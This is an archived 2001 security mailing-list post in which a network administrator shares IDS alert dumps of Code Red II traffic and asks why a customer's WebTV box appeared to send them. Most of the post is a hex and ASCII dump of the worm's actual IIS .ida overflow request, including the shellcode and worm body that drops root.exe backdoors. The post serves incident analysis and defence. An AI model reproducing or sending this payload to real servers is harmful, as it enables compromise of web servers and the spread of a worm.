Code Red - Kind of interesting actually

From: Keith Pachulski (Keith.Pachulski@corp.ptd.net)
Date: 08/27/01

• Previous message: Reeves, Michael (GEAE, Compaq): "RE: Identification needed ..."
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

Message-ID: <1737C3ED3996D511AB1900A0C9A935970B522B@exchange3.corp.ptd.net>
From: Keith Pachulski <Keith.Pachulski@corp.ptd.net>
To: "'incidents@securityfocus.com'" <incidents@securityfocus.com>, "'focus-ids@securityfocus.com'" <focus-ids@securityfocus.com>
Subject: Code Red - Kind of interesting actually
Date: Mon, 27 Aug 2001 16:15:29 -0400

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

While the following dumps seem all too familiar by now, keep reading
as the source of these are an unlikely source.

[**] IDS552 web-iis_IIS ISAPI Overflow ida [**]
08/10-13:39:51.066030 204.x.x.x:1735 -> 204.x.x.x:80
TCP TTL:125 TOS:0x0 ID:12845 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x8246A40B Ack: 0x49256627 Win: 0x2238 TcpLen: 20
47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida
3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 ?XXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 X%u9090%u6858%uc
62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090%
75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 u6858%ucbd3%u780
31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 1%u9090%u6858%uc
62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090%
75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63 u9090%u8190%u00c
33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35 3%u0003%u8b00%u5
33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25 31b%u53ff%u0078%
75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54 u0000%u00=a HTT
50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/1.0..Content-t
79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F ype: text/xml.Co
6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33 ntent-length: 33
37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00 79 ........`....
00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00 ....dg.6..dg.&..
E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF .....h......\...
50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40 P.U...\...P.U..@
10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00 .....X....U.=...
00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6 ....=...........
C9 89 8D 54 FE FF FF 8B 75 08 81 7E 30 9A 02 00 ...T....u..~0...
00 0F 84 C4 00 00 00 C7 46 30 9A 02 00 00 E8 0A ........F0......
00 00 00 43 6F 64 65 52 65 64 49 49 00 8B 1C 24 ...CodeRedII...$
FF 55 D8 66 0B C0 0F 95 85 38 FE FF FF C7 85 50 .U.f.....8.....P
FE FF FF 01 00 00 00 6A 00 8D 85 50 FE FF FF 50 .......j...P...P
8D 85 38 FE FF FF 50 8B 45 08 FF 70 08 FF 90 84 ..8...P.E..p....
00 00 00 80 BD 38 FE FF FF 01 74 68 53 FF 55 D4 .....8....thS.U.
FF 55 EC 01 45 84 69 BD 54 FE FF FF 2C 01 00 00 .U..E.i.T...,...
81 C7 2C 01 00 00 E8 D2 04 00 00 F7 D0 0F AF C7 ..,.............
89 46 34 8D 45 88 50 6A 00 FF 75 08 E8 05 00 00 .F4.E.Pj..u.....
00 E9 01 FF FF FF 6A 00 6A 00 FF 55 F0 50 FF 55 ......j.j..U.P.U
D0 4F 75 D2 E8 3B 05 00 00 69 BD 54 FE FF FF 00 .Ou..;...i.T....
5C 26 05 81 C7 00 5C 26 05 57 FF 55 E8 6A 00 6A \&....\&.W.U.j.j
16 FF 55 8C 6A FF FF 55 E8 EB F9 8B 46 34 29 45 ..U.j..U....F4)E
84 6A 64 FF 55 E8 8D 85 3C FE FF FF 50 FF 55 C0 .jd.U...<...P.U.
0F B7 85 3C FE FF FF 3D D2 07 00 00 73 CF 0F B7 ...<...=....s...
85 3E FE FF FF 83 F8 0A 73 C3 66 C7 85 70 FF FF .>......s.f..p..
FF 02 00 66 C7 85 72 FF FF FF 00 50 E8 64 04 00 ...f..r....P.d..
00 89 9D 74 FF FF FF 6A 00 6A 01 6A 02 FF 55 B8 ...t...j.j.j..U.
83 F8 FF 74 F2 89 45 80 6A 01 54 68 7E 66 04 80 ...t..E.j.Th~f..
FF 75 80 FF 55 A4 59 6A 10 8D 85 70 FF FF FF 50 .u..U.Yj...p...P
FF 75 80 FF 55 B0 BB 01 00 00 00 0B C0 74 4B 33 .u..U........tK3
DB FF 55 94 3D 33 27 00 00 75 3F C7 85 68 FF FF ..U.=3'..u?..h..
FF 0A 00 00 00 C7 85 6C FF FF FF 00 00 00 00 C7 .......l........
85 60 FF FF FF 01 00 00 00 8B 45 80 89 85 64 FF .`........E...d.
FF FF 8D 85 68 FF FF FF 50 6A 00 8D 85 60 FF FF ....h...Pj...`..
FF 50 6A 00 6A 01 FF 55 A0 93 6A 00 54 68 7E 66 .Pj.j..U..j.Th~f
04 80 FF 75 80 FF 55 A4 59 83 FB 01 75 31 E8 00 ...u..U.Y...u1..
00 00 00 58 2D D3 03 00 00 6A 00 68 EA 0E 00 00 ...X-....j.h....
50 FF 75 80 FF 55 AC 3D EA 0E 00 00 75 11 6A 00 P.u..U.=....u.j.
6A 01 8D 85 5C FE FF FF 50 FF 75 80 FF 55 A8 FF j...\...P.u..U..
75 80 FF 55 B4 E9 E7 FE FF FF BB 00 00 DF 77 81 u..U..........w.
C3 00 00 01 00 81 FB 00 00 00 78 75 05 BB 00 00 ..........xu....
F0 BF 60 E8 0E 00 00 00 8B 64 24 08 64 67 8F 06 ..`......d$.dg..
00 00 58 61 EB D9 64 67 FF 36 00 00 64 67 89 26 ..Xa..dg.6..dg.&
00 00 66 81 3B 4D 5A 75 E3 8B 4B 3C 81 3C 0B 50 ..f.;MZu..K<.<.P
45 00 00 75 D7 8B 54 0B 78 03 D3 8B 42 0C 81 3C E..u..T.x...B..<
03 4B 45 52 4E 75 C5 81 7C 03 04 45 4C 33 32 75 .KERNu..|..EL32u
BB 33 C9 49 8B 72 20 03 F3 FC 41 AD 81 3C 03 47 .3.I.r ...A..<.G
65 74 50 75 F5 81 7C 03 04 72 6F 63 41 75 EB 03 etPu..|..rocAu..
4A 10 49 D1 E1 03 4A 24 0F B7 0C 0B C1 E1 02 03 J.I...J$........
4A 1C 8B 04 0B 03 C3 89 44 24 24 64 67 8F 06 00 J.......D$$dg...
00 58 61 C3 E8 51 FF FF FF 89 5D FC 89 45 F8 E8 .Xa..Q....]..E..
0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 ....LoadLibraryA
00 FF 75 FC FF 55 F8 89 45 F4 E8 0D 00 00 00 43 ..u..U..E......C
72 65 61 74 65 54 68 72 65 61 64 00 FF 75 FC FF reateThread..u..
55 F8 89 45 F0 E8 0D 00 00 00 47 65 74 54 69 63 U..E......GetTic
6B 43 6F 75 6E 74 00 FF 75 FC FF 55 F8 89 45 EC kCount..u..U..E.
E8 06 00 00 00 53 6C 65 65 70 00 FF 75 FC FF 55 .....Sleep..u..U
F8 89 45 E8 E8 17 00 00 00 47 65 74 53 79 73 74 ..E......GetSyst
65 6D 44 65 66 61 75 6C 74 4C 61 6E 67 49 44 00 emDefaultLangID.
FF 75 FC FF 55 F8 89 45 E4 E8 14 00 00 00 47 65 .u..U..E......Ge
74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 tSystemDirectory
41 00 FF 75 FC FF 55 F8 89 45 E0 E8 0A 00 00 00 A..u..U..E......
43 6F 70 79 46 69 6C 65 41 00 FF 75 FC FF 55 F8 CopyFileA..u..U.
89 45 DC E8 10 00 00 00 47 6C 6F 62 61 6C 46 69 .E......GlobalFi
6E 64 41 74 6F 6D 41 00 FF 75 FC FF 55 F8 89 45 ndAtomA..u..U..E
D8 E8 0F 00 00 00 47 6C 6F 62 61 6C 41 64 64 41 ......GlobalAddA
74 6F 6D 41 tomA
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+=+
[**] IIS CodeRed v2 overflow root.exe [**]
08/10-13:39:51.343109 204.x.x.x:1735 -> 204.x.x.x:80
TCP TTL:125 TOS:0x0 ID:12846 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x8246A9BF Ack: 0x49256627 Win: 0x2238 TcpLen: 20
00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43 ..u..U..E......C
6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55 loseHandle..u..U
F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74 ..E......_lcreat
00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F ..u..U..E......_
6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8 lwrite..u..U..E.
E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC ....._lclose..u.
FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79 .U..E......GetSy
73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89 stemTime..u..U..
45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C E......WS2_32.DL
4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63 L..U..E......soc
6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 ket..u..U..E....
00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75 ..closesocket..u
BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74 ..U..E......ioct
6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 lsocket..u..U..E
A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75 ......connect..u
BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65 ..U..E......sele
63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00 ct..u..U..E.....
00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8 .send..u..U..E..
05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89 ....recv..u..U..
45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61 E......gethostna
6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00 me..u..U..E.....
00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF .gethostbyname..
75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41 u..U..E......WSA
47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC GetLastError..u.
FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33 .U..E......USER3
32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 2.DLL..U..E.....
00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF .ExitWindowsEx..
75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84 u..U..E...E.i...
08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1 ..@.E....xV4....
C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 ........<.t.<.t.
C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 ................
E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 ................
E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF ......... ......
FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF ................
FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04 .............Y..
81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F .#...#.X........
74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 t....t.;.X...t..
68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D h......\...P.U..
BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E ..\........\CMD.
45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 EXE.^.....cj....
00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72 ..d:\inetpub\scr
69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C ipts\root.exe...
24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 $....\...P.U.j..
2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C +...d:\progra~1\
63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C common~1\system\
4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B MSADC\root.exe..
0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA .$....\...P.U...
05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00 ....MZP.........
FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC ............@...
00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C ...........PE..L
01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0 ....*%).........
00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00 ................
00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00 ............ ...
00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00 .@..............
00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00 ............@...
04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 ................
20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 ...............
00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C ............0...
01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 ................
00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 .......... ..`..
00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04 ........... ....
00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10 ..@.............
00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00 ...0............
00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC ..........@.....
FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68 ..........h....h
D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE . @..a...... @..
00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 . @.....j.h. @..
4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31 L........h.'...1
01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A .....h.$@.h?...j
00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00 .h. @.h.....2...
0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68 ..u&j.hT @.j.j.h
48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF H @..5.$@.......
35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68 5.$@......h.$@.h
3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80 ?...j.hX @.h....
E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C .......uU.. @..L
00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68 ..... @..B...j.h
B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 . @.j.j.h. @..5.
24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A $@......j.h. @.j
01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99 .j.h. @..5.$@...
00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 ....5.$@........
05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0 ..$@.....h.$@.h.
20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40 @.h.$@.j.U.5.$@
00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B ..`.....uI..$@..
C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81 .t@.. @..>.t6Ff.
7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20 ~.,,u...217....
40 00 89 35 @..5
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+=+

once the requests triggered the IDS, they were traced back to a user
on our network. The user is a customer of webtv. Checking on the
HiPerARC verified this via the login information.

100a63010@webtvf-ip-I3055 IP slot:8/mod:7 ENA DYN
204.x.x.x/H

While working too a very small degree with Microsoft they dropped the
issue..so I for one am left with a puzzle on my hands. While the
person is using our network equipment to access the net, the are not
really a customer of ours. I reffered this information to Microsoft
who would not look into it nor question the customer. I took it upon
myself to contact the customer. The only real information they were
able to offer me was that their WebTV box was acting with on the day
of the detect I had and a few days later..after rebooting the box the
customer had no further problems. This is a WebTV device, not WebTV
for Windows.

Anyone ever see anything similar to this, or have some decent
explanation besides spoofing or tcp hijacking as Microsoft already
gave us those and we have since disregarded those due to our network
setup.

- -Keith

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0.4

iQA/AwUBO4qrpuGTq6qVSXTQEQL//wCgolNxyde+hBW9KBedD/W6FHdOb2wAoLAU
pXmAtCmmBLMgLVzWQM9RaePp
=PTuG
-----END PGP SIGNATURE-----

---

• text/plain attachment: alert.txt

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com

---

• Previous message: Reeves, Michael (GEAE, Compaq): "RE: Identification needed ..."
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

Relevant Pages Re: Cyberterrorism [was: Re: NSA wiretap, Friday night] ... Otherwise the ISP is just ... My most recent contacts were in response to appeals here by "imhotep" ... got an abuse complaint for email coming from our network, ... system on a server that saw all traffic coming from the customer side ... (comp.os.linux.security) Re: Conficker (and friends) v.s. Penetration Testing ... their network with PDF and the reverse http connection. ... The customer implemented our recommendations and when we ... Conficker v.s. Penetration Testing ... (Pen-Test) Re: A place where non-mention of VMS is good ! ... Microsoft, I have many problems with what they have done to computing. ... community forum site run by two of the principals from Winternals. ... information about the internals of the Windows operating system. ... Microsoft is meeting all standard customer and partner commitments ... (comp.os.vms) Re: Please help me "sell" the idea of a more secure network ... changes first should bring the network up a notch or two. ... Do the same thing using a wireless notebook from you company. ... show him a PO or invoice for a customer who had an AV ... products, releases, life cycles, etc, all on the individual clients. ... (microsoft.public.win2000.active_directory) Re: Please help me "sell" the idea of a more secure network ... changes first should bring the network up a notch or two. ... Do the same thing using a wireless notebook from you company. ... show him a PO or invoice for a customer who had an AV ... products, releases, life cycles, etc, all on the individual clients. ... (microsoft.public.win2000.active_directory)

---

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > securityfocus  > incidents  > 2001-08